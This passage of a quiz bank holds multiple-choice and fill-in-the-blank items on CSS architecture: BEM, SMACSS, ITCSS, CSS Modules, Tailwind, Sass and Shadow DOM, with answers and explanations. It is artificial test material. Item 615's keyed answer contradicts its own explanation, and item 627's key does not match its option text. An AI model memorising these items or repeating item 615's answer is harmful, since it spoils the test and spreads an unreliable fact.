[
  {
    "id": 601,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Why Architecture Matters",
    "question": "Why is CSS architecture and methodology crucial for large-scale web applications?",
    "code_snippet": null,
    "options": ["It makes the CSS file size smaller", "It prevents 'specificity wars', reduces dead code, and ensures that styles are predictable, maintainable, and scalable across a team of developers", "It automatically translates CSS to JavaScript", "It is required by the HTML5 specification"],
    "correct_answer": "It prevents 'specificity wars', reduces dead code, and ensures that styles are predictable, maintainable, and scalable across a team of developers",
    "explanation": "Without a methodology, CSS quickly becomes a tangled mess of overlapping rules, `!important` hacks, and fear of deleting old code. Architecture brings order to the chaos."
  },
  {
    "id": 602,
    "level": "beginner",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "BEM Basics",
    "question": "What does the acronym BEM stand for in CSS methodology?",
    "code_snippet": null,
    "options": ["Basic Element Module", "Block Element Modifier", "Border Edge Margin", "Base Extension Method"],
    "correct_answer": "Block Element Modifier",
    "explanation": "BEM is the most popular CSS naming convention. It stands for Block (the standalone component), Element (a part of the block), and Modifier (a variation or state of the block/element)."
  },
  {
    "id": 603,
    "level": "beginner",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "code-fill-in-blank",
    "topic": "BEM Syntax (Block)",
    "question": "In BEM, a 'Block' is a standalone component. Fill in the blank to correctly name a BEM block class for a search form.",
    "code_snippet": "<form class='_______'>\n  ...\n</form>",
    "options": ["search-form__component", "search-form", "search-form--block", "#search-form"],
    "correct_answer": "search-form",
    "explanation": "A Block is named using a simple, descriptive kebab-case name. It represents the root of the component. It does not use any special BEM punctuation in its own name."
  },
  {
    "id": 604,
    "level": "beginner",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "code-fill-in-blank",
    "question": "Fill in the blank to correctly name an 'Element' (a part of the block) using BEM syntax.",
    "code_snippet": "<input class='_______' type='text' />",
    "options": ["search-form__input", "search-form--input", "search-form_input", "input__search-form"],
    "correct_answer": "search-form__input",
    "explanation": "Elements are attached to their Block using a double underscore (`__`). The syntax is always `block-name__element-name`. This creates a clear, unbreakable link between the part and the whole."
  },
  {
    "id": 605,
    "level": "beginner",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "code-fill-in-blank",
    "question": "Fill in the blank to correctly name a 'Modifier' (a variation or state) using BEM syntax.",
    "code_snippet": "<button class='search-form__button _______'>\n  Submit\n</button>",
    "options": ["search-form__button--disabled", "search-form__button--is-disabled", "search-form__button__disabled", "search-form--disabled"],
    "correct_answer": "search-form__button--disabled",
    "explanation": "Modifiers are attached using a double hyphen (`--`). The syntax is `block__element--modifier` or `block--modifier`. It represents an alternate version or state (like size, color, or disabled state)."
  },
  {
    "id": 606,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "BEM Nesting Rule",
    "question": "According to strict BEM methodology, how do you name an element that is nested inside another element (e.g., an icon inside a button inside a form)?",
    "code_snippet": null,
    "options": ["search-form__button__icon", "search-form__icon", "search-form--button__icon", "button__icon"],
    "correct_answer": "search-form__icon",
    "explanation": "In BEM, elements are always named relative to the BLOCK, not relative to their parent element. You never chain double underscores (`__elem1__elem2`). The icon belongs to the `search-form` block, so it is `search-form__icon`."
  },
  {
    "id": 607,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "BEM Specificity",
    "question": "What is the primary CSS specificity advantage of using the BEM methodology?",
    "code_snippet": null,
    "options": ["It relies heavily on ID selectors", "Every class is a single, flat class selector (e.g., `.block__element`), resulting in a very low, predictable specificity (0,1,0) that completely eliminates specificity wars", "It uses `!important` on every rule", "It requires nesting classes inside each other in CSS"],
    "correct_answer": "Every class is a single, flat class selector (e.g., `.block__element`), resulting in a very low, predictable specificity (0,1,0) that completely eliminates specificity wars",
    "explanation": "Because BEM never uses descendant selectors (like `.block .element`), the specificity never compounds. You can override any BEM style easily without fighting the cascade."
  },
  {
    "id": 608,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "OOCSS Basics",
    "question": "What does OOCSS stand for?",
    "code_snippet": null,
    "options": ["Object-Oriented CSS", "Out-of-Context CSS", "Open-Source CSS", "Optimized Order CSS"],
    "correct_answer": "Object-Oriented CSS",
    "explanation": "Pioneered by Nicole Sullivan, OOCSS encourages developers to think of CSS like objects in programming: reusable, decoupled, and structured."
  },
  {
    "id": 609,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "OOCSS Principle 1",
    "question": "What is the first major principle of OOCSS: 'Separate structure from skin'?",
    "code_snippet": null,
    "options": ["Keep all colors and fonts in a single file", "Separate positioning/box-model properties (structure) from visual properties like colors/backgrounds (skin), so they can be mixed and matched independently", "Use only black and white", "Never use background images"],
    "correct_answer": "Separate positioning/box-model properties (structure) from visual properties like colors/backgrounds (skin), so they can be mixed and matched independently",
    "explanation": "If you create a `.box` class with padding and borders (structure), and a `.bg-blue` class for the background (skin), you can reuse the `.box` structure with any skin, drastically reducing duplicate CSS."
  },
  {
    "id": 610,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "OOCSS Principle 2",
    "question": "What is the second major principle of OOCSS: 'Separate container from content'?",
    "code_snippet": null,
    "options": ["Never use HTML tags in CSS selectors", "Avoid using location-based selectors (like `.sidebar h2`); instead, create reusable classes (like `.text-large`) so the content looks the same regardless of where it is placed", "Always put content inside a `<div>`", "Use JavaScript to move content"],
    "correct_answer": "Avoid using location-based selectors (like `.sidebar h2`); instead, create reusable classes (like `.text-large`) so the content looks the same regardless of where it is placed",
    "explanation": "If you style `h2` based on being inside a `.sidebar`, you can't reuse that `h2` in a `.footer`. OOCSS dictates that elements should carry their own styles via classes, making them truly portable."
  },
  {
    "id": 611,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "SMACSS Basics",
    "question": "What does SMACSS stand for?",
    "code_snippet": null,
    "options": ["Scalable and Modular Architecture for CSS", "Standard Method for Advanced CSS", "Simple Modular CSS", "Static Media CSS"],
    "correct_answer": "Scalable and Modular Architecture for CSS",
    "explanation": "Created by Jonathan Snook, SMACSS provides a systematic way to categorize your CSS rules, making large stylesheets easier to navigate and maintain."
  },
  {
    "id": 612,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "SMACSS Categories",
    "question": "What are the five core categories of CSS rules in the SMACSS methodology?",
    "code_snippet": null,
    "options": ["Header, Footer, Sidebar, Main, Nav", "Base, Layout, Module, State, Theme", "Variables, Mixins, Functions, Loops, Nesting", "Grid, Flex, Block, Inline, Table"],
    "correct_answer": "Base, Layout, Module, State, Theme",
    "explanation": "SMACSS organizes CSS into these five buckets: Base (defaults/tag styles), Layout (page grid), Module (reusable components), State (JS-driven UI states), and Theme (cosmetic overrides)."
  },
  {
    "id": 613,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "code-fill-in-blank",
    "question": "In SMACSS, 'State' rules define how modules look when JavaScript changes their state (e.g., active, hidden). Fill in the blank with the standard SMACSS prefix for state classes.",
    "code_snippet": ".modal { display: none; }\n.modal._______active { display: block; }",
    "options": ["is-", "mod-", "state-", "js-"],
    "correct_answer": "is-",
    "explanation": "SMACSS recommends prefixing state classes with `is-` (e.g., `is-active`, `is-hidden`, `is-expanded`). This clearly communicates that the class is dynamic and likely toggled by JavaScript."
  },
  {
    "id": 614,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "ITCSS Basics",
    "question": "What does ITCSS stand for, and what problem does it solve?",
    "code_snippet": null,
    "options": ["Inverse Text CSS; it reverses text direction", "Inverted Triangle CSS; it solves the problem of CSS specificity and maintainability by organizing files from broad/generic to narrow/explicit", "Integrated Theme CSS; it combines Sass and Less", "Inline Table CSS; it fixes table layouts"],
    "correct_answer": "Inverted Triangle CSS; it solves the problem of CSS specificity and maintainability by organizing files from broad/generic to narrow/explicit",
    "explanation": "Created by Harry Roberts, ITCSS is a meta-framework. It dictates the exact order in which you import your CSS partials, ensuring that specificity naturally increases as you move down the file, preventing specificity wars."
  },
  {
    "id": 615,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "ITCSS Layers",
    "question": "In the ITCSS 'Inverted Triangle', which layer comes LAST (and therefore has the highest specificity and most explicit scope)?",
    "code_snippet": null,
    "options": ["Settings (Variables)", "Generic (Resets/Normalize)", "Elements (Raw HTML tags like `a`, `h1`)", "Components (Specific UI widgets like `.card`, `.modal`)"],
    "correct_answer": "Components (Specific UI widgets like `.card`, `.modal`)",
    "explanation": "The ITCSS triangle flows from: 1. Settings, 2. Tools, 3. Generic, 4. Elements, 5. Objects, 6. Components, 7. Utilities. Utilities (like `.u-hidden`) sit at the very bottom, acting as the final trump card."
  },
  {
    "id": 616,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Specificity Wars",
    "question": "What is a 'Specificity War' in a large CSS codebase?",
    "code_snippet": null,
    "options": ["When two developers argue over code", "When developers continuously write more specific selectors (or add `!important`) to override previous styles, resulting in an unmaintainable, fragile cascade", "When the browser crashes from too many CSS rules", "When CSS files are too large to download"],
    "correct_answer": "When developers continuously write more specific selectors (or add `!important`) to override previous styles, resulting in an unmaintainable, fragile cascade",
    "explanation": "Without architecture, a developer might write `.header .nav ul li a` to override a simple `a` rule. The next developer has to write an even longer selector to override that. It's a race to the bottom."
  },
  {
    "id": 617,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Dead CSS",
    "question": "What is 'Dead CSS' (or unused CSS) and why is it a major problem in large projects?",
    "code_snippet": null,
    "options": ["CSS that is commented out", "CSS rules that exist in the stylesheet but are no longer applied to any HTML elements, increasing file size and making the codebase terrifying to modify", "CSS that only works in Internet Explorer", "CSS that is loaded asynchronously"],
    "correct_answer": "CSS rules that exist in the stylesheet but are no longer applied to any HTML elements, increasing file size and making the codebase terrifying to modify",
    "explanation": "In large teams, developers are often afraid to delete old CSS because they don't know if it's being used somewhere obscure. Methodologies and tools (like PurgeCSS) are required to keep the codebase clean."
  },
  {
    "id": 618,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "CSS Scoping",
    "question": "What is the concept of 'CSS Scoping' in modern frontend architecture?",
    "code_snippet": null,
    "options": ["Making CSS files smaller", "Ensuring that the styles defined for one component (like a `.button`) do not accidentally leak out and affect other components on the page", "Hiding CSS from the browser inspector", "Using only inline styles"],
    "correct_answer": "Ensuring that the styles defined for one component (like a `.button`) do not accidentally leak out and affect other components on the page",
    "explanation": "Scoping is the holy grail of CSS architecture. If you can guarantee that a component's CSS is completely isolated, you never have to worry about breaking another part of the site when you update it."
  },
  {
    "id": 619,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "BEM vs Descendant Selectors",
    "question": "Why does BEM strictly forbid the use of descendant selectors (e.g., `.card .title`) in favor of flat classes (e.g., `.card__title`)?",
    "code_snippet": null,
    "options": ["Descendant selectors are deprecated", "Descendant selectors tie the component's styling to the HTML structure, making it impossible to reuse the `.title` class outside of a `.card` without overriding it", "Descendant selectors are slower to type", "Descendant selectors don't work in Flexbox"],
    "correct_answer": "Descendant selectors tie the component's styling to the HTML structure, making it impossible to reuse the `.title` class outside of a `.card` without overriding it",
    "explanation": "If you use `.card .title`, you can never use that exact `.title` class inside a `.modal` without it inheriting the card's styles. Flat BEM classes (`.card__title`, `.modal__title`) are 100% decoupled and portable."
  },
  {
    "id": 620,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Methodology Philosophy",
    "question": "What is the ultimate goal of adopting a CSS methodology like BEM, OOCSS, or ITCSS?",
    "code_snippet": null,
    "options": ["To write as much CSS as possible", "To create a shared, strict vocabulary and set of rules that allows a team of developers to write CSS that is predictable, reusable, and free of side-effects", "To completely eliminate the need for classes", "To force everyone to use Sass"],
    "correct_answer": "To create a shared, strict vocabulary and set of rules that allows a team of developers to write CSS that is predictable, reusable, and free of side-effects",
    "explanation": "CSS is easy to learn but notoriously hard to scale. Methodologies provide the 'rules of the road' that prevent a 100-developer team from accidentally breaking each other's work."
  }
]
[
  {
    "id": 621,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "CSS Modules",
    "question": "What is the primary feature of CSS Modules?",
    "code_snippet": null,
    "options": ["It allows writing CSS inside JavaScript files", "It automatically scopes CSS classes to the specific component they are imported into, preventing global namespace collisions", "It compiles Sass to CSS", "It removes unused CSS automatically"],
    "correct_answer": "It automatically scopes CSS classes to the specific component they are imported into, preventing global namespace collisions",
    "explanation": "CSS Modules parse your CSS and generate unique, hashed class names (e.g., `.button__abc123`). This guarantees that your component's styles will never leak out and accidentally affect another part of the application."
  },
  {
    "id": 622,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "code-fill-in-blank",
    "topic": "CSS Modules (Global Scope)",
    "question": "In CSS Modules, how do you apply a style that should remain global and NOT be locally scoped?",
    "code_snippet": "_______(.my-global-class) {\n  color: red;\n}",
    "options": [":scoped(global)", ":global", "!global", "@global"],
    "correct_answer": ":global",
    "explanation": "By wrapping a selector in `:global()`, you tell the CSS Modules parser to leave that specific class name exactly as it is, allowing it to target standard, un-hashed global HTML classes."
  },
  {
    "id": 623,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "CSS Modules (composes)",
    "question": "What does the `composes` keyword do in CSS Modules?",
    "code_snippet": null,
    "options": ["It imports an external CSS file", "It allows a class to inherit styles from another class within the same or different module, similar to Sass `@extend`", "It combines two media queries", "It creates a CSS variable"],
    "correct_answer": "It allows a class to inherit styles from another class within the same or different module, similar to Sass `@extend`",
    "explanation": "`.button { composes: primary-color from './colors.css'; }` allows you to build complex components by composing smaller, single-purpose style objects together."
  },
  {
    "id": 624,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "CSS Modules vs BEM",
    "question": "Why did the rise of CSS Modules and CSS-in-JS reduce the strict need for BEM naming conventions?",
    "code_snippet": null,
    "options": ["Because BEM was officially deprecated by the W3C", "Because these tools provide automatic, guaranteed CSS scoping at the build/runtime level, eliminating the need for manual naming conventions to prevent style leakage", "Because they make CSS files significantly smaller", "Because they only work with Flexbox"],
    "correct_answer": "Because these tools provide automatic, guaranteed CSS scoping at the build/runtime level, eliminating the need for manual naming conventions to prevent style leakage",
    "explanation": "BEM was created to solve the global namespace problem using human-readable naming. If the build tool automatically scopes the CSS for you, you no longer need to type `.block__element--modifier` to prevent collisions."
  },
  {
    "id": 625,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "CSS-in-JS",
    "question": "What is 'CSS-in-JS'?",
    "code_snippet": null,
    "options": ["Writing HTML inside CSS files", "A methodology where CSS is written using JavaScript syntax, often co-located with the component logic, and injected into the DOM at runtime or build time", "Using JavaScript to animate CSS", "A browser extension for debugging CSS"],
    "correct_answer": "A methodology where CSS is written using JavaScript syntax, often co-located with the component logic, and injected into the DOM at runtime or build time",
    "explanation": "Libraries like Styled Components or Emotion allow you to write actual CSS inside your React/Vue components, giving you access to JavaScript variables, props, and logic directly in your styles."
  },
  {
    "id": 626,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "code-fill-in-blank",
    "topic": "Styled Components",
    "question": "In Styled Components, how do you pass dynamic values from React props to CSS?",
    "code_snippet": "const Button = styled.button`\n  color: ${_______};\n`;",
    "options": ["data-attribute", "props => props.primary ? 'blue' : 'gray'", "var(--color)", "this.style.color"],
    "correct_answer": "props => props.primary ? 'blue' : 'gray'",
    "explanation": "Styled Components uses JavaScript template literals. You can interpolate any JavaScript expression, including functions that receive the component's `props` and return a CSS value."
  },
  {
    "id": 627,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "CSS-in-JS Performance",
    "question": "What is a major performance consideration when using runtime CSS-in-JS libraries (like Styled Components)?",
    "code_snippet": null,
    "options": ["They make the CSS file size larger", "They require parsing and generating CSS in the browser at runtime, which can add overhead to the main thread during initial render or theme changes", "They disable hardware acceleration", "They prevent the use of CSS Grid"],
    "correct_answer": "They require parsing and generating CSS in the browser at runtime, which can add overhead to the browser's main thread during initial render or theme changes",
    "explanation": "Because the CSS is generated by JavaScript on the fly, the browser must parse the JS, generate the CSS string, and inject it into the `<head>`. This is why 'zero-runtime' CSS-in-JS (like Vanilla Extract) is becoming popular."
  },
  {
    "id": 628,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Utility-First CSS",
    "question": "What is the core philosophy of Utility-First CSS (like Tailwind CSS)?",
    "code_snippet": null,
    "options": ["Writing semantic class names like `.user-profile-card`", "Building designs directly in the HTML using small, single-purpose utility classes like `flex`, `pt-4`, `text-center`", "Using only ID selectors", "Writing all CSS in a single massive file"],
    "correct_answer": "Building designs directly in the HTML using small, single-purpose utility classes like `flex`, `pt-4`, `text-center`",
    "explanation": "Instead of inventing new class names for every component, you compose designs using a constrained set of pre-existing utility classes. This keeps your CSS file size tiny and eliminates the need to context-switch to a CSS file."
  },
  {
    "id": 629,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "code-fill-in-blank",
    "topic": "Tailwind @apply",
    "question": "In Tailwind CSS, what does the `@apply` directive do?",
    "code_snippet": ".custom-card {\n  _______ flex flex-col p-4 rounded-lg;\n}",
    "options": ["@import", "@apply", "@use", "@extend"],
    "correct_answer": "@apply",
    "explanation": "`@apply` extracts Tailwind utility classes and injects their CSS into a custom class. This allows you to create reusable components while keeping the HTML clean, bridging the gap between utility-first and component-based CSS."
  },
  {
    "id": 630,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Tailwind JIT",
    "question": "What is the JIT (Just-In-Time) engine in modern Tailwind CSS?",
    "code_snippet": null,
    "options": ["A JavaScript framework", "A build-time feature that generates only the exact CSS utilities you use in your HTML on demand, resulting in incredibly small CSS file sizes even in development", "A tool to minify images", "A plugin for Sass"],
    "correct_answer": "A build-time feature that generates only the exact CSS utilities you use in your HTML on demand, resulting in incredibly small CSS file sizes even in development",
    "explanation": "Before JIT, Tailwind generated a massive 10MB+ CSS file with every possible utility. JIT scans your HTML and generates only the classes you actually use, resulting in CSS files that are often under 10kb."
  },
  {
    "id": 631,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Utility-First Criticism",
    "question": "What is a common criticism of Utility-First CSS?",
    "code_snippet": null,
    "options": ["The CSS file size is too small", "It makes the HTML markup very verbose and cluttered with long strings of class names, which some developers find ugly or hard to read", "It doesn't support responsive design", "It requires JavaScript to work"],
    "correct_answer": "It makes the HTML markup very verbose and cluttered with long strings of class names, which some developers find ugly or hard to read",
    "explanation": "A div might end up looking like `<div class='flex items-center justify-between p-4 bg-white rounded-lg shadow-md'>`. While highly efficient, it moves the styling complexity from the CSS file into the HTML template."
  },
  {
    "id": 632,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Sass Mixin vs Extend",
    "question": "In Sass, what is the difference between a Mixin (`@mixin`) and a Placeholder (`%placeholder` with `@extend`)?",
    "code_snippet": null,
    "options": ["They are exactly the same", "A Mixin copies the CSS rules into the selector every time it's included (potentially duplicating code); `@extend` groups selectors together to share the same CSS rule block", "Mixins are for variables, Placeholders are for functions", "Placeholders are deprecated"],
    "correct_answer": "A Mixin copies the CSS rules into the selector every time it's included (potentially duplicating code); `@extend` groups selectors together to share the same CSS rule block",
    "explanation": "If you `@include` a mixin with arguments, it generates new CSS every time. If you `@extend %placeholder`, Sass combines the selectors (e.g., `.btn, .btn-primary { color: red; }`), resulting in less duplicate CSS output."
  },
  {
    "id": 633,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Sass vs CSS Variables",
    "question": "Why are modern developers encouraged to use native CSS Custom Properties (`var(--name)`) instead of Sass variables (`$name`) for things like colors and spacing?",
    "code_snippet": null,
    "options": ["Sass variables are officially deprecated", "CSS Custom Properties are live in the browser, meaning they can be changed dynamically via JavaScript or media queries at runtime, whereas Sass variables are compiled away to static values", "CSS variables load faster", "Sass variables cannot hold colors"],
    "correct_answer": "CSS Custom Properties are live in the browser, meaning they can be changed dynamically via JavaScript or media queries at runtime, whereas Sass variables are compiled away to static values",
    "explanation": "Sass variables only exist during the build step. Once compiled to CSS, they are gone. CSS variables exist in the browser DOM, enabling powerful features like instant dark-mode toggling or responsive design tokens."
  },
  {
    "id": 634,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "code-fill-in-blank",
    "topic": "Sass Nesting",
    "question": "What does the `&` (parent selector) do in Sass nesting?",
    "code_snippet": ".button {\n  _______:hover {\n    background: blue;\n  }\n}",
    "options": ["&", "parent", "this", "root"],
    "correct_answer": "&",
    "explanation": "The `&` symbol references the parent selector. It is essential for attaching pseudo-classes (`.button:hover`), pseudo-elements (`.button::before`), or BEM modifiers (`.button--active`) without repeating the parent class name."
  },
  {
    "id": 635,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Modern Sass Modules",
    "question": "What is the modern, recommended way to share code between Sass files, replacing the legacy `@import` rule?",
    "code_snippet": null,
    "options": ["@require", "@use and @forward", "@include", "@extend"],
    "correct_answer": "@use and @forward",
    "explanation": "The `@import` rule was deprecated because it loaded everything into the global scope and slowed down compilation. `@use` loads a file as a namespaced module, and `@forward` allows you to pass those members forward to other files."
  },
  {
    "id": 636,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "PostCSS",
    "question": "What is PostCSS?",
    "code_snippet": null,
    "options": ["A CSS preprocessor like Sass", "A tool for transforming CSS with JavaScript plugins, allowing you to use experimental features, add vendor prefixes, or lint your code", "A JavaScript framework", "A browser engine"],
    "correct_answer": "A tool for transforming CSS with JavaScript plugins, allowing you to use experimental features, add vendor prefixes, or lint your code",
    "explanation": "PostCSS itself does nothing out of the box. It is a pipeline that takes your CSS, runs it through a series of JS plugins (like Autoprefixer or CSSNano), and outputs the final CSS."
  },
  {
    "id": 637,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Autoprefixer",
    "question": "What is the primary function of the 'Autoprefixer' PostCSS plugin?",
    "code_snippet": null,
    "options": ["It minifies the CSS", "It automatically adds (and removes) vendor prefixes (like `-webkit-`, `-moz-`) based on current browser support data (from Can I Use)", "It converts CSS to JavaScript", "It formats the CSS"],
    "correct_answer": "It automatically adds (and removes) vendor prefixes (like `-webkit-`, `-moz-`) based on current browser support data (from Can I Use)",
    "explanation": "You write clean, standard CSS (e.g., `display: flex;`), and Autoprefixer reads your `browserslist` config to automatically inject `display: -webkit-flex;` if you need to support older Safari versions."
  },
  {
    "id": 638,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "postcss-preset-env",
    "question": "What does the `postcss-preset-env` plugin do?",
    "code_snippet": null,
    "options": ["It sets up a local web server", "It converts modern CSS features into older, compatible CSS based on the target browsers you specify, similar to what Babel does for JavaScript", "It compresses images", "It generates HTML"],
    "correct_answer": "It converts modern CSS features into older, compatible CSS based on the target browsers you specify, similar to what Babel does for JavaScript",
    "explanation": "It allows you to write cutting-edge CSS (like custom media queries or nesting) and automatically polyfills them so they work in older browsers, acting as a 'time machine' for CSS."
  },
  {
    "id": 639,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Evolution of Preprocessors",
    "question": "How has the role of CSS Preprocessors (Sass/Less) changed in the modern web development landscape?",
    "code_snippet": null,
    "options": ["They are completely obsolete and no longer used by anyone", "Their core features (variables, nesting, mixins) have been largely adopted by native CSS, so their usage is declining in favor of native CSS, PostCSS, and utility frameworks", "They are now required by all browsers", "They have replaced JavaScript entirely"],
    "correct_answer": "Their core features (variables, nesting, mixins) have been largely adopted by native CSS, so their usage is declining in favor of native CSS, PostCSS, and utility frameworks",
    "explanation": "Native CSS now has variables, nesting, `calc()`, and `color-mix()`. While Sass is still heavily used, the gap between native CSS and preprocessors is closing rapidly, leading many teams to drop Sass entirely."
  },
  {
    "id": 640,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Modern Architecture Stack",
    "question": "If you are starting a brand new, large-scale enterprise project today, which combination of CSS architecture tools is considered the most modern and robust?",
    "code_snippet": null,
    "options": ["Pure CSS with no tools or build steps", "A utility-first framework (like Tailwind) for rapid UI development, combined with CSS Modules or a scoped CSS-in-JS solution for complex component logic, and PostCSS for polyfills", "Only Sass with strict BEM naming", "Inline styles for every single element"],
    "correct_answer": "A utility-first framework (like Tailwind) for rapid UI development, combined with CSS Modules or a scoped CSS-in-JS solution for complex component logic, and PostCSS for polyfills",
    "explanation": "Modern architecture leverages the speed of utility classes for 80% of the work, while relying on scoped component styles (CSS Modules/JS) for complex, dynamic, or state-driven UI, all tied together by a PostCSS build pipeline."
  }
]
[
  {
    "id": 641,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "CSS Houdini",
    "question": "What is the CSS Houdini initiative?",
    "code_snippet": null,
    "options": ["A CSS preprocessor", "A set of low-level APIs that expose parts of the CSS engine, allowing developers to extend CSS by writing JavaScript that the browser can parse and render natively", "A JavaScript framework for animations", "A tool to minify CSS"],
    "correct_answer": "A set of low-level APIs that expose parts of the CSS engine, allowing developers to extend CSS by writing JavaScript that the browser can parse and render natively",
    "explanation": "Houdini allows developers to write 'worklets' (similar to Web Workers) that hook directly into the browser's rendering pipeline, enabling custom layout algorithms, custom paint rendering, and custom property types."
  },
  {
    "id": 642,
    "level": "advanced",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "CSS Paint API",
    "question": "What does the CSS Paint API (part of Houdini) allow you to do?",
    "code_snippet": null,
    "options": ["Animate CSS properties", "Generate custom background images, borders, or masks dynamically using a JavaScript 'paint worklet', which runs on the browser's rendering thread for high performance", "Translate CSS to Canvas", "Compress images"],
    "correct_answer": "Generate custom background images, borders, or masks dynamically using a JavaScript 'paint worklet', which runs on the browser's rendering thread for high performance",
    "explanation": "Instead of using heavy DOM nodes or massive SVG files for complex patterns, the Paint API lets you draw them programmatically using the Canvas API, directly inside your CSS `background-image` property."
  },
  {
    "id": 643,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "conceptual",
    "topic": "Shadow DOM Basics",
    "question": "What is the Shadow DOM in the context of CSS architecture?",
    "code_snippet": null,
    "options": ["A dark mode CSS theme", "A browser feature that encapsulates a DOM subtree and its CSS, ensuring that the styles inside a web component cannot leak out, and global styles cannot leak in", "A method to hide elements from screen readers", "A CSS animation technique"],
    "correct_answer": "A browser feature that encapsulates a DOM subtree and its CSS, ensuring that the styles inside a web component cannot leak out, and global styles cannot leak in",
    "explanation": "The Shadow DOM provides true, native CSS scoping. It is the foundation of Web Components, guaranteeing that a third-party widget's CSS will never accidentally break your site's layout."
  },
  {
    "id": 644,
    "level": "intermediate",
    "module_id": "css_mod_09_architecture",
    "module_name": "CSS Architecture & Methodologies",
    "type": "code-fill-in-blank",
    "topic": "Shadow DOM (:host)",
    "question": "Fill in the blank to style the root element of a Shadow DOM (the custom element itself) from within its internal stylesheet.",
    "code_snippet": "_______ {\n  display: block;\n  background: white;\n}",
    "options": [":root", ":host", ":self", ":component"],
    "correct_answer": ":host",
